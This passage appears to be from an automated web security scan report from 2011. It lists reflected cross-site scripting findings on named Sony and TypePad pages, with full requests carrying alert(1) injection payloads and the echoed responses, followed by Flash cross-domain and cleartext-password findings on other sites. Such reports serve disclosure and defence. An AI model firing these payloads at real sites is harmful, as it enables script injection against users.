fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:07 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1d9060"-alert(1)-"4496b4fc800&stateId=1+0+328800294";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";
strUrl = viewDocUrl + "&highligh
...[SNIP]...

1.45. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0b2e"-alert(1)-"8ea97393960 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294&f0b2e"-alert(1)-"8ea97393960=1 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:11 GMT
Content-Length: 15708


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
l = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294&f0b2e"-alert(1)-"8ea97393960=1";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";
strUrl = viewDocUrl + "&highlight=" + strValue;

...[SNIP]...

1.46. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the sliceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b7a'%3balert(1)//5e4fc876c82 was submitted in the sliceId parameter. This input was echoed as 86b7a';alert(1)//5e4fc876c82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_186b7a'%3balert(1)//5e4fc876c82&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:56:16 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
, 'no');
           break;
       case 'bookmark' :
               addBookmark('http://www.kb.sony.com:80/selfservice/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=${extId}&sliceId=pdfPage_186b7a';alert(1)//5e4fc876c82');
           break;
       case 'full' :
           openWnd('http://www.kb.sony.com:80/selfservice/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=${extId}&sliceId=pdfPage_186b7a';alert(1)//5e
...[SNIP]...

1.47. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the sliceId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d3ec"-alert(1)-"1b2827b41a1 was submitted in the sliceId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_15d3ec"-alert(1)-"1b2827b41a1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:56:15 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
ipt">

function documentCommands(cmd){
   switch (cmd){
       case 'hilite' :
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=BNP1USESpdf&sliceId=pdfPage_15d3ec"-alert(1)-"1b2827b41a1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strV
...[SNIP]...

1.48. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [stateId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the stateId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8a7b"-alert(1)-"defc0e3e037 was submitted in the stateId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294d8a7b"-alert(1)-"defc0e3e037 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:08 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
rl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294d8a7b"-alert(1)-"defc0e3e037";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";
strUrl = viewDocUrl + "&highlight=" + strValue;

...[SNIP]...

1.49. http://www.typepad.com/services/toolbar [autofollowed parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /services/toolbar

Issue detail

The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e142b%3balert(1)//db967658d0d was submitted in the autofollowed parameter. This input was echoed as e142b;alert(1)//db967658d0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/toolbar?blog_id=6a010535f33a5b970c010535ecb398970b&asset_id=&atype=index&to=http%3A%2F%2Fblog.proofpoint.com%2F&autofollowed=0e142b%3balert(1)//db967658d0d&safe_to_modify_body=0 HTTP/1.1
Host: www.typepad.com
Proxy-Connection: keep-alive
Referer: http://blog.proofpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 20:53:00 GMT
Server: Apache
X-Webserver: oak-tp-app002
Cache-Control: private
Pragma: no-cache
Vary: cookie,negotiate,accept-language,Accept-Encoding
Content-Language: en
Content-Length: 14888
Content-Type: text/html; charset=utf-8
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:at="http://www.sixapart.c
...[SNIP]...
lorAnim = YAHOO.util.ColorAnim,
Easing = YAHOO.util.Easing,
Cookie = YAHOO.util.Cookie,
TPToolbar = {};

TPToolbar = {

params: {
autofollowed: 0e142b;alert(1)//db967658d0d,
blog_user_xid: '6p010535f33a5b970c',
display: 0,
entry_xid: '',
logged_in: 0,
safe_to_modify_body: '0',
permal
...[SNIP]...

2. Flash cross-domain policy  previous  next
There are 4 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


2.1. http://www.viddler.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.viddler.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:09 GMT
Content-Type: application/xml
Connection: close
X-Viddler-Node: viddler_a
Accept-Ranges: bytes
ETag: W/"80-1311663400000"
Last-Modified: Tue, 26 Jul 2011 06:56:40 GMT
Content-Length: 80

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

2.2. http://blog.trendmicro.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: blog.trendmicro.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.54
Content-Type: text/xml
Last-Modified: Fri, 27 Nov 2009 13:41:16 GMT
ETag: "11c044-128-4795a7226b700"
X-Varnish: 1696291533
Cache-Control: no-store
Expires: Tue, 06 Sep 2011 18:16:27 GMT
Date: Tue, 06 Sep 2011 18:16:27 GMT
Content-Length: 296
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.trendmicro.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.rocket-media.info" secure="true" />
...[SNIP]...

2.3. http://wd.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: wd.sharethis.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 17:46:04 GMT
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

2.4. http://www.typepad.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.typepad.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 20:52:09 GMT
Server: Apache
X-Webserver: oak-tp-app017
Cache-Control: private
Pragma: no-cache
Vary: cookie
Content-Length: 401
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="static.typepad.com" />
<allow-
...[SNIP]...
<allow-access-from domain="*.sixapart.com" />
<allow-access-from domain="*.videoegg.com" />
<allow-access-from domain="*.saymedia.com" />
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://webconnect.sendouts.com/login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:31:59 GMT
Content-Length: 6707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<body>

<form name="WebForm1" method="post" action="login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&amp;ID=cfs&amp;SiteID=WebConnect&amp;Group=cfs&amp;Key=CN&amp;CnId=" onsubmit="javascript:return WebForm_OnSubmit();" id="WebForm1">
<div>
...[SNIP]...
<br />
                               <input name="txtPassword" type="password" id="txtPassword" /><span id="RequiredFieldValidator2" class="ErrorMsg" style="color:Red;display:none;">
...[SNIP]...

3.2. http://www.javalobby.org/articles/acegisecurity/part1.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /articles/acegisecurity/part1.jsp HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:55:34 GMT
Content-Length: 33566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
   <head>

       <title>Securing Your Java Applications - Acegi Security Style</title>
<meta http-equiv="content-type"
...[SNIP]...
<div class="welcomebar">
       
               <form action="/forums/login.jspa" method="post" name="loginform">
               Username/Email: <input type="text" name="username" size="20" maxlength="150" value="" tabindex="1" id="username01" />
               Password: <input type="password" name="password" size="20" maxlength="150" value="" tabindex="2" id="password01" />
               <input type="hidden" name="autoLogin" id="autoLogin01" value="true" />
...[SNIP]...

3.3. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<div id="login" name="login" method="post" action="/community/rtn_login08.php">
<form id="form_login">
<fieldset>
...[SNIP]...
<td>
<input name="upass" type="password" id="jq_password" class="inputtext" />
</td>
...[SNIP]...

4. Session token in URL  previous  next
There are 4 instances of this issue:

Issue background

